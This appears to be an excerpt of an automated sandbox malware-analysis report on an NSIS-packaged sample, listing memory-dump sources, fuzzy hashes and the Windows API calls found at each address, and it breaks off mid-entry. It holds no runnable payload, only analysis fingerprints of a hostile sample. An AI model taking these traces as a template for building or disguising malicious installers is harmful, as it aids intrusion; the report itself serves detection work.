                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,774D3420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ^$^$^$^
                                                                                                              • API String ID: 0-3251756440
                                                                                                              • Opcode ID: 7d8af25bd8888ff866f82b4b98b59983fd3cb1442735defa2738555b1558e1c6
                                                                                                              • Instruction ID: 25ff95e4b570313104a2ad29fb79af3fcffafa2db8786192a8bd0e692fc13730
                                                                                                              • Opcode Fuzzy Hash: 7d8af25bd8888ff866f82b4b98b59983fd3cb1442735defa2738555b1558e1c6
                                                                                                              • Instruction Fuzzy Hash: B801A55290E7E19FF72397308CA1B853FA08E13195B5F40E6C0D08F4A3DA58588AC7AA
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
